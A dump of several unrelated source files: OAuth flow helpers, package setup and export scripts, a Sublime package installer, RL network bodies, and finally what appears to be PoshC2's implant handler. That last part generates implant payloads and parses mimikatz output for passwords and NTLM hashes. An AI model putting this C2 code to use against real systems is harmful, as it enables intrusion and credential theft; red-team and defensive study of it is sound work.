"""The OAuth 2.0 redirect URI. Pass-through to
``self.oauth2session.redirect_uri``."""
return self.oauth2session.redirect_uri
@redirect_uri.setter
def redirect_uri(self, value):
self.oauth2session.redirect_uri = value
def authorization_url(self, **kwargs):
"""Generates an authorization URL.
This is the first step in the OAuth 2.0 Authorization Flow. The user's
browser should be redirected to the returned URL.
This method calls
:meth:`requests_oauthlib.OAuth2Session.authorization_url`
and specifies the client configuration's authorization URI (usually
Google's authorization server) and specifies that "offline" access is
desired. This is required in order to obtain a refresh token.
Args:
kwargs: Additional arguments passed through to
:meth:`requests_oauthlib.OAuth2Session.authorization_url`
Returns:
Tuple[str, str]: The generated authorization URL and state. The
user must visit the URL to complete the flow. The state is used
when completing the flow to verify that the request originated
from your application. If your application is using a different
:class:`Flow` instance to obtain the token, you will need to
specify the ``state`` when constructing the :class:`Flow`.
"""
kwargs.setdefault("access_type", "offline")
if self.autogenerate_code_verifier:
chars = ascii_letters + digits + "-._~"
rnd = SystemRandom()
random_verifier = [rnd.choice(chars) for _ in range(0, 128)]
self.code_verifier = "".join(random_verifier)
if self.code_verifier:
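# PKCE S256 transform (RFC 7636): the challenge sent to the server is
# base64url(SHA256(code_verifier)) with the trailing '=' padding stripped,
# which is what the next few lines compute.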
code_hash = hashlib.sha256()
code_hash.update(str.encode(self.code_verifier))
unencoded_challenge = code_hash.digest()
b64_challenge = urlsafe_b64encode(unencoded_challenge)
code_challenge = b64_challenge.decode().split("=")[0]
kwargs.setdefault("code_challenge", code_challenge)
kwargs.setdefault("code_challenge_method", "S256")
url, state = self.oauth2session.authorization_url(
self.client_config["auth_uri"], **kwargs
)
return url, state
def fetch_token(self, **kwargs):
"""Completes the Authorization Flow and obtains an access token.
This is the final step in the OAuth 2.0 Authorization Flow. This is
called after the user consents.
This method calls
:meth:`requests_oauthlib.OAuth2Session.fetch_token`
and specifies the client configuration's token URI (usually Google's
token server).
Args:
kwargs: Arguments passed through to
:meth:`requests_oauthlib.OAuth2Session.fetch_token`. At least
one of ``code`` or ``authorization_response`` must be
specified.
Returns:
Mapping[str, str]: The obtained tokens. Typically, you will not use the
return value of this function and instead use
:meth:`credentials` to obtain a
:class:`~google.auth.credentials.Credentials` instance.
"""
kwargs.setdefault("client_secret", self.client_config["client_secret"])
kwargs.setdefault("code_verifier", self.code_verifier)
return self.oauth2session.fetch_token(self.client_config["token_uri"], **kwargs)
@property
def credentials(self):
"""Returns credentials from the OAuth 2.0 session.
:meth:`fetch_token` must be called before accessing this. This method
constructs a :class:`google.oauth2.credentials.Credentials` class using
the session's token and the client config.
Returns:
google.oauth2.credentials.Credentials: The constructed credentials.
Raises:
ValueError: If there is no access token in the session.
"""
return google_auth_oauthlib.helpers.credentials_from_session(
self.oauth2session, self.client_config
)
def authorized_session(self):
"""Returns a :class:`requests.Session` authorized with credentials.
:meth:`fetch_token` must be called before this method. This method
constructs a :class:`google.auth.transport.requests.AuthorizedSession`
class using this flow's :attr:`credentials`.
Returns:
google.auth.transport.requests.AuthorizedSession: The constructed
session.
"""
return google.auth.transport.requests.AuthorizedSession(self.credentials)
class InstalledAppFlow(Flow):
"""Authorization flow helper for installed applications.
This :class:`Flow` subclass makes it easier to perform the
`Installed Application Authorization Flow`_. This flow is useful for
local development or applications that are installed on a desktop operating
system.
This flow has two strategies: The console strategy provided by
:meth:`run_console` and the local server strategy provided by
:meth:`run_local_server`.
Example::
from google_auth_oauthlib.flow import InstalledAppFlow
flow = InstalledAppFlow.from_client_secrets_file(
'client_secrets.json',
scopes=['profile', 'email'])
flow.run_local_server()
session = flow.authorized_session()
profile_info = session.get(
'https://www.googleapis.com/userinfo/v2/me').json()
print(profile_info)
# {'name': '...', 'email': '...', ...}
Note that these aren't the only two ways to accomplish the installed
application flow, they are just the most common ways. You can use the
:class:`Flow` class to perform the same flow with different methods of
presenting the authorization URL to the user or obtaining the authorization
response, such as using an embedded web view.
.. _Installed Application Authorization Flow:
https://github.com/googleapis/google-api-python-client/blob/main/docs/oauth-installed.md
"""
_OOB_REDIRECT_URI = "urn:ietf:wg:oauth:2.0:oob"
_DEFAULT_AUTH_PROMPT_MESSAGE = (
"Please visit this URL to authorize this application: {url}"
)
"""str: The message to display when prompting the user for
authorization."""
_DEFAULT_AUTH_CODE_MESSAGE = "Enter the authorization code: "
"""str: The message to display when prompting the user for the
authorization code. Used only by the console strategy."""
_DEFAULT_WEB_SUCCESS_MESSAGE = (
"The authentication flow has completed. You may close this window."
)
def run_console(
self,
authorization_prompt_message=_DEFAULT_AUTH_PROMPT_MESSAGE,
authorization_code_message=_DEFAULT_AUTH_CODE_MESSAGE,
**kwargs
):
"""Run the flow using the console strategy.
The console strategy instructs the user to open the authorization URL
in their browser. Once the authorization is complete the authorization
server will give the user a code. The user then must copy & paste this
code into the application. The code is then exchanged for a token.
Args:
authorization_prompt_message (str): The message to display to tell
the user to navigate to the authorization URL.
authorization_code_message (str): The message to display when
prompting the user for the authorization code.
kwargs: Additional keyword arguments passed through to
:meth:`authorization_url`.
Returns:
google.oauth2.credentials.Credentials: The OAuth 2.0 credentials
for the user.
"""
kwargs.setdefault("prompt", "consent")
self.redirect_uri = self._OOB_REDIRECT_URI
auth_url, _ = self.authorization_url(**kwargs)
print(authorization_prompt_message.format(url=auth_url))
code = input(authorization_code_message)
self.fetch_token(code=code)
return self.credentials
def run_local_server(
self,
host="localhost",
port=8080,
authorization_prompt_message=_DEFAULT_AUTH_PROMPT_MESSAGE,
success_message=_DEFAULT_WEB_SUCCESS_MESSAGE,
open_browser=True,
redirect_uri_trailing_slash=True,
**kwargs
):
"""Run the flow using the server strategy.
The server strategy instructs the user to open the authorization URL in
their browser and will attempt to automatically open the URL for them.
It will start a local web server to listen for the authorization
response. Once authorization is complete the authorization server will
redirect the user's browser to the local web server. The web server
will get the authorization code from the response and shutdown. The
code is then exchanged for a token.
Args:
host (str): The hostname for the local redirect server. This will
be served over http, not https.
port (int): The port for the local redirect server.
authorization_prompt_message (str): The message to display to tell
the user to navigate to the authorization URL.
success_message (str): The message to display in the web browser when
the authorization flow is complete.
open_browser (bool): Whether or not to open the authorization URL
in the user's browser.
redirect_uri_trailing_slash (bool): whether or not to add trailing
slash when constructing the redirect_uri. Default value is True.
kwargs: Additional keyword arguments passed through to
:meth:`authorization_url`.
Returns:
google.oauth2.credentials.Credentials: The OAuth 2.0 credentials
for the user.
"""
wsgi_app = _RedirectWSGIApp(success_message)
# Fail fast if the address is occupied
wsgiref.simple_server.WSGIServer.allow_reuse_address = False
local_server = wsgiref.simple_server.make_server(
host, port, wsgi_app, handler_class=_WSGIRequestHandler
)
redirect_uri_format = (
"http://{}:{}/" if redirect_uri_trailing_slash else "http://{}:{}"
)
self.redirect_uri = redirect_uri_format.format(host, local_server.server_port)
auth_url, _ = self.authorization_url(**kwargs)
if open_browser:
webbrowser.open(auth_url, new=1, autoraise=True)
print(authorization_prompt_message.format(url=auth_url))
local_server.handle_request()
# Note: using https here because oauthlib is very picky that
# OAuth 2.0 should only occur over https.
authorization_response = wsgi_app.last_request_uri.replace("http", "https")
self.fetch_token(authorization_response=authorization_response)
# This closes the socket
local_server.server_close()
return self.credentials
class _WSGIRequestHandler(wsgiref.simple_server.WSGIRequestHandler):
"""Custom WSGIRequestHandler.
Uses a named logger instead of printing to stderr.
"""
def log_message(self, format, *args):
# pylint: disable=redefined-builtin
# (format is the argument name defined in the superclass.)
_LOGGER.info(format, *args)
class _RedirectWSGIApp(object):
"""WSGI app to handle the authorization redirect.
Stores the request URI and displays the given success message.
"""
def __init__(self, success_message):
"""
Args:
success_message (str): The message to display in the web browser when
the authorization flow is complete.
"""
self.last_request_uri = None
self._success_message = success_message
def __call__(self, environ, start_response):
"""WSGI Callable.
Args:
environ (Mapping[str, Any]): The WSGI environment.
start_response (Callable[str, list]): The WSGI start_response
callable.
Returns:
Iterable[bytes]: The response body.
"""
start_response("200 OK", [("Content-type", "text/plain; charset=utf-8")])
self.last_request_uri = wsgiref.util.request_uri(environ)
return [self._success_message.encode("utf-8")]
|
the-stack_106_14883
|
import os
from distutils import log
from os.path import join as pjoin
from jupyter_packaging import (
combine_commands,
create_cmdclass,
ensure_targets,
get_version,
install_npm,
)
from setuptools import find_packages, setup
here = os.path.dirname(os.path.abspath(__file__))
log.set_verbosity(log.DEBUG)
log.info("setup.py entered")
log.info("$PATH=%s" % os.environ["PATH"])
name = "jupyter_rfb"
LONG_DESCRIPTION = "Remote Frame Buffer for Jupyter"
# Get jupyter_rfb version
version = get_version(pjoin(name, "_version.py"))
js_dir = pjoin(here, "js")
# Representative files that should exist after a successful build
jstargets = [
pjoin(js_dir, "dist", "index.js"),
]
data_files_spec = [
("share/jupyter/nbextensions/jupyter_rfb", "jupyter_rfb/nbextension", "*.*"),
("share/jupyter/labextensions/jupyter_rfb", "jupyter_rfb/labextension", "**"),
("share/jupyter/labextensions/jupyter_rfb", ".", "install.json"),
("etc/jupyter/nbconfig/notebook.d", ".", "jupyter_rfb.json"),
]
cmdclass = create_cmdclass("jsdeps", data_files_spec=data_files_spec)
cmdclass["jsdeps"] = combine_commands(
install_npm(js_dir, npm=["yarn"], build_cmd="build:prod"),
ensure_targets(jstargets),
)
setup_args = dict(
name=name,
version=version,
description="Remote Frame Buffer for Jupyter",
long_description=LONG_DESCRIPTION,
include_package_data=True,
install_requires=[
"numpy",
"ipywidgets>=7.6.0",
],
python_requires=">=3.6",
packages=find_packages(),
zip_safe=False,
cmdclass=cmdclass,
author="Almar Klein",
author_email="[email protected]",
license="MIT",
url="https://github.com/vispy/jupyter_rfb",
keywords=[
"ipython",
"jupyter",
"widgets",
"visualization",
"remote frame buffer",
],
classifiers=[
"Development Status :: 4 - Beta",
"Framework :: IPython",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Topic :: Multimedia :: Graphics",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
)
setup(**setup_args)
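# A hedged build note: installing from source (e.g. `pip install .`) is expected to run the
# "jsdeps" command above, which invokes yarn to produce js/dist/index.js; a working node/yarn
# toolchain is assumed to be available.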
|
the-stack_106_14887
|
import os
import gzip
import logging
import shutil
from pathlib import Path
from tempfile import NamedTemporaryFile
from irrd.conf import get_setting
from irrd.rpki.status import RPKIStatus
from irrd.storage.database_handler import DatabaseHandler
from irrd.storage.queries import RPSLDatabaseQuery, DatabaseStatusQuery
from irrd.utils.text import remove_auth_hashes
EXPORT_PERMISSIONS = 0o644
logger = logging.getLogger(__name__)
class SourceExportRunner:
"""
This SourceExportRunner is the entry point for the export process
for a single source.
A gzipped file will be created in the export_destination directory
with the contents of the source, along with a CURRENTSERIAL file.
The contents of the source are first written to a temporary file, and
then moved in place.
"""
def __init__(self, source: str) -> None:
self.source = source
def run(self) -> None:
self.database_handler = DatabaseHandler()
try:
export_destination = get_setting(f'sources.{self.source}.export_destination')
logger.info(f'Starting a source export for {self.source} to {export_destination}')
self._export(export_destination)
self.database_handler.commit()
except Exception as exc:
logger.error(f'An exception occurred while attempting to run an export '
f'for {self.source}: {exc}', exc_info=exc)
finally:
self.database_handler.close()
def _export(self, export_destination):
filename_export = Path(export_destination) / f'{self.source.lower()}.db.gz'
export_tmpfile = NamedTemporaryFile(delete=False)
filename_serial = Path(export_destination) / f'{self.source.upper()}.CURRENTSERIAL'
query = DatabaseStatusQuery().source(self.source)
try:
serial = next(self.database_handler.execute_query(query))['serial_newest_seen']
except StopIteration:
logger.error(f'Unable to run export for {self.source}, internal database status is empty.')
return
with gzip.open(export_tmpfile, 'wb') as fh:
query = RPSLDatabaseQuery().sources([self.source])
query = query.rpki_status([RPKIStatus.not_found, RPKIStatus.valid])
for obj in self.database_handler.execute_query(query):
object_bytes = remove_auth_hashes(obj['object_text']).encode('utf-8')
fh.write(object_bytes + b'\n')
fh.write(b'# EOF\n')
os.chmod(export_tmpfile.name, EXPORT_PERMISSIONS)
if filename_export.exists():
os.unlink(filename_export)
if filename_serial.exists():
os.unlink(filename_serial)
shutil.move(export_tmpfile.name, filename_export)
if serial is not None:
with open(filename_serial, 'w') as fh:
fh.write(str(serial))
os.chmod(filename_serial, EXPORT_PERMISSIONS)
self.database_handler.record_serial_exported(self.source, serial)
logger.info(f'Export for {self.source} complete at serial {serial}, stored in {filename_export} / {filename_serial}')
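# A minimal usage sketch; the source name is illustrative and assumes the IRRD settings define
# sources.EXAMPLE.export_destination:
#   SourceExportRunner('EXAMPLE').run()
#   # -> writes example.db.gz and EXAMPLE.CURRENTSERIAL into the export directory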
|
the-stack_106_14888
|
import re
import threading
import time
import sublime
from .thread_progress import ThreadProgress
from .package_manager import PackageManager
from .package_disabler import PackageDisabler
from .versions import version_comparable
from .commands.advanced_install_package_command import AdvancedInstallPackageThread
USE_QUICK_PANEL_ITEM = hasattr(sublime, 'QuickPanelItem')
class PackageInstaller(PackageDisabler):
"""
Provides helper functionality related to installing packages
"""
def __init__(self):
PackageDisabler.__init__(self)
self.manager = PackageManager()
self.debug = self.manager.settings.get('debug')
# Track what the color scheme was before upgrade so we can restore it
self.old_color_scheme_package = None
self.old_color_scheme = None
# Track what the theme was before upgrade so we can restore it
self.old_theme_package = None
self.old_theme = None
def make_package_list(self, ignore_actions=[], override_action=None, ignore_packages=[]):
"""
Creates a list of packages and what operation would be performed for
each. Allows filtering by the applicable action or package name.
Returns the information in a format suitable for displaying in the
quick panel.
:param ignore_actions:
A list of actions to ignore packages by. Valid actions include:
`install`, `upgrade`, `downgrade`, `reinstall`, `overwrite`,
`pull` and `none`. `pull` and `none` are for Git and Hg
repositories. `pull` is present when incoming changes are detected,
whereas `none` is selected if no commits are available. `overwrite`
is for packages that do not include version information via the
`package-metadata.json` file.
:param override_action:
A string action name to override the displayed action for all listed
packages.
:param ignore_packages:
A list of packages names that should not be returned in the list
:return:
A list of lists, each containing three strings:
0 - package name
1 - package description
2 - action; [extra info;] package url
"""
packages = self.manager.list_available_packages()
installed_packages = self.manager.list_packages()
package_list = []
for package in sorted(iter(packages.keys()), key=lambda s: s.lower()):
if ignore_packages and package in ignore_packages:
continue
info = packages[package]
release = info['releases'][0]
if package in installed_packages:
installed = True
metadata = self.manager.get_metadata(package)
if self.debug: print('package', package, 'metadata', metadata.get('version'), 'release_version', release['version'])
if metadata.get('version'):
installed_version = metadata['version']
else:
installed_version = None
else:
installed = False
installed_version_name = 'v' + installed_version if \
installed and installed_version else 'unknown version'
new_version = 'v' + release['version']
vcs = None
settings = self.manager.settings
if override_action:
action = override_action
extra = ''
else:
if self.manager.is_vcs_package(package):
to_ignore = settings.get('ignore_vcs_packages')
if to_ignore is True:
continue
if isinstance(to_ignore, list) and package in to_ignore:
continue
upgrader = self.manager.instantiate_upgrader(package)
vcs = upgrader.cli_name
incoming = upgrader.incoming()
if installed:
if vcs:
if incoming:
action = 'pull'
extra = ' with ' + vcs
else:
action = 'none'
extra = ''
elif not installed_version:
action = 'overwrite'
extra = ' %s with %s' % (installed_version_name, new_version)
else:
installed_version = version_comparable(installed_version)
new_version_cmp = version_comparable(release['version'])
if new_version_cmp > installed_version:
action = 'upgrade'
extra = ' to %s from %s' % (new_version, installed_version_name)
elif new_version_cmp < installed_version:
action = 'downgrade'
extra = ' to %s from %s' % (new_version, installed_version_name)
else:
action = 'reinstall'
extra = ' %s' % new_version
else:
action = 'install'
extra = ' %s' % new_version
extra += ';'
if action in ignore_actions:
continue
description = info.get('description')
if not description:
description = 'No description provided'
homepage = info['homepage']
homepage_display = re.sub('^https?://', '', homepage)
if USE_QUICK_PANEL_ITEM:
description = '<em>%s</em>' % sublime.html_format_command(description)
final_line = '<em>' + action + extra + '</em>'
if homepage_display:
if action or extra:
final_line += ' '
final_line += '<a href="%s">%s</a>' % (homepage, homepage_display)
package_entry = sublime.QuickPanelItem(package, [description, final_line])
else:
package_entry = [package]
package_entry.append(description)
final_line = action + extra
if final_line and homepage_display:
final_line += ' '
final_line += homepage_display
package_entry.append(final_line)
package_list.append(package_entry)
return package_list
def on_done(self, picked):
"""
Quick panel user selection handler - disables a package, installs or
upgrades it, then re-enables the package
:param picked:
An integer of the 0-based package name index from the presented
list. -1 means the user cancelled.
"""
if picked == -1:
return
if USE_QUICK_PANEL_ITEM:
name = self.package_list[picked].trigger
else:
name = self.package_list[picked][0]
thread = AdvancedInstallPackageThread(name)
thread.start()
ThreadProgress(
thread,
'Installing package %s' % name,
'Package %s successfully %s' % (name, self.completion_type)
)
class PackageInstallerThread(threading.Thread):
"""
A thread to run package install/upgrade operations in so that the main
Sublime Text thread does not get blocked and freeze the UI
"""
def __init__(self, manager, package, on_complete, pause=False):
"""
:param manager:
An instance of :class:`PackageManager`
:param package:
The string package name to install/upgrade
:param on_complete:
A callback to run after installing/upgrading the package
:param pause:
If we should pause before upgrading to allow a package to be
fully disabled.
"""
self.package = package
self.manager = manager
self.on_complete = on_complete
self.pause = pause
threading.Thread.__init__(self)
def run(self):
if self.pause:
time.sleep(0.7)
try:
self.result = self.manager.install_package(self.package)
except (Exception):
self.result = False
raise
finally:
# Do not reenable if deferred until next restart
if self.on_complete and self.result is not None:
sublime.set_timeout(self.on_complete, 700)
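# A minimal usage sketch for the thread above; the package name is illustrative:
#   manager = PackageManager()
#   PackageInstallerThread(manager, 'Example Package', on_complete=None, pause=False).start()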
|
the-stack_106_14891
|
import re
import os
import requests
from datetime import datetime
from .settings import IRS_XML_HTTP_BASE, WORKING_DIRECTORY, INDEX_DIRECTORY
OBJECT_ID_RE = re.compile(r'20\d{16}')
# Not sure how much detail we need to go into here
OBJECT_ID_MSG = """
This appears not to be an IRS object id.
The ID should be 18 digits long and start with
the four digit year, e.g. 201642229349300909
To find the object id, see the yearly index csv files.
"""
def stream_download(url, target_path, verbose=False):
""" Download a large file without loading it into memory. """
response = requests.get(url, stream=True)
handle = open(target_path, "wb")
if verbose:
print("Beginning streaming download of %s" % url)
start = datetime.now()
try:
content_length = int(response.headers['Content-Length'])
content_MB = content_length/1048576.0
print("Total file size: %.2f MB" % content_MB)
except KeyError:
pass # allow Content-Length to be missing
for chunk in response.iter_content(chunk_size=512):
if chunk: # filter out keep-alive new chunks
handle.write(chunk)
if verbose:
print(
"Download completed to %s in %s" %
(target_path, datetime.now() - start))
def validate_object_id(object_id):
""" It's easy to make a mistake entering these, validate the format """
result = re.match(OBJECT_ID_RE, str(object_id))
if not result:
print("'%s' appears not to be a valid 990 object_id" % object_id)
raise RuntimeError(OBJECT_ID_MSG)
return object_id
def get_s3_URL(object_id):
return ("%s/%s_public.xml" % (IRS_XML_HTTP_BASE, object_id))
def get_local_path(object_id):
file_name = "%s_public.xml" % object_id
return os.path.join(WORKING_DIRECTORY, file_name)
def get_index_file_URL(year):
return ("%s/index_%s.csv" % (IRS_XML_HTTP_BASE, year))
def get_local_index_path(year):
csv_file_name = "index_%s.csv" % year
return os.path.join(INDEX_DIRECTORY, csv_file_name)
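# A minimal usage sketch; the object id is the example one from OBJECT_ID_MSG above and the
# calls assume the settings module points at valid local directories:
#   object_id = validate_object_id("201642229349300909")
#   stream_download(get_s3_URL(object_id), get_local_path(object_id), verbose=True)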
|
the-stack_106_14893
|
#######################################################################
# Copyright (C) 2017 Shangtong Zhang([email protected]) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
from .network_utils import *
### tsa ###
class MLPBody(nn.Module):
def __init__(self, input_dim, feature_dim=512, hidden_dim=512):
super().__init__()
self.fc1 = layer_init(nn.Linear(input_dim, hidden_dim))
self.fc2 = layer_init(nn.Linear(hidden_dim, feature_dim))
self.feature_dim = feature_dim
def forward(self, x):
return self.fc2(F.relu(self.fc1(x.view(x.size(0), -1))))
class TSAConvBody(nn.Module):
def __init__(self, in_channels=12, feature_dim=512, scale=1, gate=F.relu):
super().__init__()
self.feature_dim = feature_dim
self.conv1_1 = layer_init(nn.Conv2d(in_channels, 32, kernel_size=3, padding=1)) # 16->16
self.conv1_2 = layer_init(nn.Conv2d(32, 32, stride=2, kernel_size=3, padding=1)) # 16->8
self.conv2_1 = layer_init(nn.Conv2d(32, 32, kernel_size=3, padding=1)) # 8->8
self.conv2_2 = layer_init(nn.Conv2d(32, 64, stride=2, kernel_size=3, padding=1)) # 8->4
self.conv3_1 = layer_init(nn.Conv2d(64, 64, kernel_size=3, padding=1)) # 4->4
self.conv3_2 = layer_init(nn.Conv2d(64, 128, stride=2,kernel_size=3, padding=1)) # 4->2
self.conv4_1 = layer_init(nn.Conv2d(128, 128, kernel_size=3, padding=1)) # 2->2
self.conv4_2 = layer_init(nn.Conv2d(128, 128, kernel_size=3, padding=1)) # 2->2
self.fc = layer_init(nn.Linear(2 * scale * 2 * scale * 128, self.feature_dim))
self.gate = gate
def forward(self, x):  # apply the gate (ReLU by default) between every conv layer
y = self.gate(self.conv1_2(self.gate(self.conv1_1(x))))
y = self.gate(self.conv2_2(self.gate(self.conv2_1(y))))
y = self.gate(self.conv3_2(self.gate(self.conv3_1(y))))
y = self.gate(self.conv4_2(self.gate(self.conv4_1(y))))
y = y.view(y.size(0), -1)
y = self.gate(self.fc(y))
return y
class TSAMiniConvBody(nn.Module):
def __init__(self, in_channels=12, feature_dim=512, scale=1, gate=F.relu): # scale only works for 2^n
super().__init__()
self.feature_dim = feature_dim
self.conv1 = layer_init(nn.Conv2d(in_channels, 32, stride=2, kernel_size=3, padding=1)) # 16->8
self.conv2 = layer_init(nn.Conv2d(32, 64, stride=2, kernel_size=3, padding=1)) # 8->4
self.conv3 = layer_init(nn.Conv2d(64, 128, stride=2,kernel_size=3, padding=1)) # 4->2
self.fc = layer_init(nn.Linear(2 * scale * 2 * scale * 128, self.feature_dim))
self.gate = gate
def forward(self, x):
y = self.gate(self.conv1(x))
y = self.gate(self.conv2(y))
y = self.gate(self.conv3(y))
y = y.view(y.size(0), -1)
y = self.gate(self.fc(y))
return y
### end of tsa ###
class NatureConvBody(nn.Module):
def __init__(self, in_channels=4):
super(NatureConvBody, self).__init__()
self.feature_dim = 512
self.conv1 = layer_init(nn.Conv2d(in_channels, 32, kernel_size=8, stride=4))
self.conv2 = layer_init(nn.Conv2d(32, 64, kernel_size=4, stride=2))
self.conv3 = layer_init(nn.Conv2d(64, 64, kernel_size=3, stride=1))
self.fc4 = layer_init(nn.Linear(7 * 7 * 64, self.feature_dim))
def forward(self, x):
y = F.relu(self.conv1(x))
y = F.relu(self.conv2(y))
y = F.relu(self.conv3(y))
y = y.view(y.size(0), -1)
y = F.relu(self.fc4(y))
return y
class FCBody(nn.Module):
def __init__(self, state_dim, hidden_units=(64, 64), gate=F.relu):
super(FCBody, self).__init__()
dims = (state_dim, ) + hidden_units
self.layers = nn.ModuleList([layer_init(nn.Linear(dim_in, dim_out)) for dim_in, dim_out in zip(dims[:-1], dims[1:])])
self.gate = gate
self.feature_dim = dims[-1]
def forward(self, x):
for layer in self.layers:
x = self.gate(layer(x))
return x
class DummyBody(nn.Module):
def __init__(self, state_dim):
super(DummyBody, self).__init__()
self.feature_dim = state_dim
def forward(self, x):
return x
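# A minimal shape-check sketch for the TSA bodies (assumes torch is importable via
# network_utils and a 16x16 observation, which is what the layer comments above are sized for):
#   body = TSAMiniConvBody(in_channels=12, feature_dim=512)
#   feats = body(torch.zeros(8, 12, 16, 16))   # -> shape (8, 512), i.e. (batch, feature_dim)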
|
the-stack_106_14894
|
#!/usr/bin/env python3
import sys, re, os, time, subprocess, traceback, signal, argparse, readline
from Help import logopic, PRECOMMANDS, UXCOMMANDS, SHARPCOMMANDS, COMMANDS, pre_help
from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails
from DB import get_newimplanturl, get_implantbyid, get_implants, get_history_dict, get_lastcommand
from DB import new_commandhistory, get_c2urls, del_autorun, del_autoruns, add_autorun, get_autorun, get_newtasks_all
from DB import drop_newtasks, get_implanttype, get_history, get_randomuri, get_hostdetails
from Colours import Colours
from Config import PayloadsDirectory, POSHDIR
from HTML import generate_table, graphviz
from TabComplete import tabCompleter
from Payloads import Payloads
from Utils import validate_sleep_time, randomuri
from PyHandler import handle_py_command
from SharpHandler import handle_sharp_command
from PSHandler import handle_ps_command
if os.name == 'nt':
import pyreadline.rlmain
def catch_exit(signum, frame):
sys.exit(0)
def process_mimikatz(lines):
# code source https://github.com/stufus/parse-mimikatz-log/blob/master/pml.py
main_count = 0
current = {}
all = []
for line in lines.split('\n'):
main_count += 1
val = re.match(r'^\s*\*\s+Username\s+:\s+(.+)\s*$', line.strip())
if val is not None:
x = process_mimikatzout(current)
if x not in all:
if x is not None:
all.append(x)
current = {}
current['Username'] = val.group(1).strip()
continue
val = re.match(r'^\s*\*\s+(Domain|NTLM|SHA1|Password)\s+:\s+(.+)\s*$', line.strip())
if val is not None:
if val.group(2).count(" ") < 10:
current[val.group(1).strip()] = val.group(2)
return all
def process_mimikatzout(current):
fields = ['Domain', 'Username', 'NTLM', 'SHA1', 'Password']
for f in fields:
if f in current:
if current[f] == '(null)':
current[f] = ''
else:
current[f] = ''
if current['Username'] != '' and (current['Password'] != '' or current['NTLM'] != ''):
return current['Username'], current['Password'], current['NTLM']
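# For reference, the regexes in process_mimikatz expect sekurlsa::logonpasswords output lines
# shaped like the following (values are placeholders):
#   * Username : someuser
#   * Domain   : SOMEDOMAIN
#   * NTLM     : <32-hex-char hash>
#   * Password : <cleartext password, if available>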
def createproxypayload(user, startup):
proxyuser = input("Proxy User: e.g. Domain\\user ")
proxypass = input("Proxy Password: e.g. Password1 ")
proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
credsexpire = input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
update_item("ProxyURL", "C2Server", proxyurl)
update_item("ProxyUser", "C2Server", proxyuser)
update_item("ProxyPass", "C2Server", proxypass)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
newPayload.CreateRaw("Proxy")
newPayload.CreateDlls("Proxy")
newPayload.CreateShellcode("Proxy")
newPayload.CreateEXE("Proxy")
newPayload.CreateMsbuild("Proxy")
new_urldetails("Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire)
startup(user, "Created new proxy payloads")
def createdaisypayload(user, startup):
name = input("Daisy name: e.g. DC1 ")
domain = input("Domain or URL: https://www.example.com ")
daisyurl = input("Daisy host: .e.g. http://10.150.10.1 ")
if (daisyurl == "http://127.0.0.1"):
daisyurl = "http://localhost"
if (daisyurl == "https://127.0.0.1"):
daisyurl = "https://localhost"
daisyport = input("Daisy port: .e.g. 8888 ")
daisyhostid = input("Select Daisy Implant Host: e.g. 5 ")
daisyhost = get_implantbyid(daisyhostid)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "",
"", proxynone, C2[19], C2[20],
C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory)
newPayload.PSDropper = (newPayload.PSDropper).replace("$pid;%s" % (daisyurl + ":" + daisyport), "$pid;%s@%s" % (daisyhost[11], daisyhost[3]))
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
new_urldetails(name, C2[1], C2[3], domain, daisyurl, daisyhostid, "")
startup(user, "Created new %s daisy payloads" % name)
def createnewpayload(user, startup):
domain = input("Domain or URL: https://www.example.com ")
domainbase = (domain.lower()).replace('https://', '')
domainbase = domainbase.replace('http://', '')
domainfront = input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ")
proxyurl = input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
randomid = randomuri(5)
proxyuser = ""
proxypass = ""
credsexpire = ""
if proxyurl:
proxyuser = input("Proxy User: e.g. Domain\\user ")
proxypass = input("Proxy Password: e.g. Password1 ")
credsexpire = input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
imurl = "%s?p" % get_newimplanturl()
domainbase = "Proxy%s%s" % (domainbase, randomid)
else:
domainbase = "%s%s" % (randomid, domainbase)
imurl = get_newimplanturl()
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser,
proxypass, proxyurl, "", "", C2[19], C2[20],
C2[21], imurl, PayloadsDirectory)
newPayload.CreateRaw("%s_" % domainbase)
newPayload.CreateDlls("%s_" % domainbase)
newPayload.CreateShellcode("%s_" % domainbase)
newPayload.CreateEXE("%s_" % domainbase)
newPayload.CreateMsbuild("%s_" % domainbase)
newPayload.CreatePython("%s_" % domainbase)
new_urldetails(randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire)
startup(user, "Created new payloads")
def complete(text, state):
for cmd in COMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
def startup(user, printhelp=""):
try:
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
except Exception:
print("cls")
print(chr(27) + "[2J")
print(Colours.GREEN)
print(logopic)
try:
if user is not None:
print("User: " + Colours.END + Colours.BLUE + "%s%s" % (user, Colours.END))
print("")
ii = get_implants()
if ii:
for i in ii:
ID = i[0]
LastSeen = i[7]
Hostname = i[3]
Domain = i[11]
DomainUser = i[2]
Arch = i[10]
PID = i[8]
Pivot = i[15]
Sleep = i[13].strip()
Label = i[16]
pivot_original = Pivot
if pivot_original.startswith("PS"):
Pivot = "PS"
elif pivot_original.startswith("C#"):
Pivot = "C#"
elif pivot_original.startswith("Python"):
Pivot = "PY"
if "Daisy" in pivot_original:
Pivot = Pivot + ";D"
